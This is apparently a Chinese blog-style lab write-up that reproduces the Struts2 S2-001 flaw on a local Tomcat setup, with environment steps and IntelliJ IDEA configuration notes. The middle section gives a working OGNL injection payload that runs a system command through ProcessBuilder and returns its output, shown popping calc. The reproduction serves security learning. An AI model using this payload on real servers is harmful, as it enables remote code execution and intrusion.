环境
1、Windows x64 家庭版
2、java 1.8.0_144
3、tomcat 7.0.94
搭建java
搭建tomcat
1、下载tomcat
2、搭建tomcat环境
3、解压下载的zip,运行bin/startup.bat,tomcat就运行了,输入http://127.0.0.1:8080/,访问成功
搭建struts2
1、下载struts2,(github推荐使用chrome 的 Octo Mate插件,可下载单个文件),其它下载
2、将war放到tomcat的webapps目录下,运行tomcat,webapps下的war包就会自动解压
3、访问http://127.0.0.1:8080/S2-001/
复现漏洞S2-001
1、验证,输入密码%{1+1}
验证.png
2、结果,返回2,存在漏洞
结果.png
3、利用payload弹出计算机
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cmd.exe", "/c", "calc"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
弹出计算机
图片.png
IntelliJ IDEA搭建tomcat
将 Tomcat 安装为系统服务,在 tomcat的bin目录下,cmd 中运行service.bat install, 提示安装成功--->The service 'Tomcat7' has been installed,在系统服务找到它--->Apache Tomcat 7.0.94 Server。
在 cmd 中运行 **service.bat install
1、下载IntelliJ IDEA,Ultimate版免费
2、安装IntelliJ IDEA
3、点击Run---EDit Configurations...
4、点击左侧“+”号,找到Tomcat Server---Local(若是没有找到Tomcat Server 可以点击最后一行 34 items more)
5、在Tomcat Server -> Unnamed -> Server -> Application server项目下,点击 Configuration ,找到本地 Tomcat 服务器,再点击 OK按钮
网友评论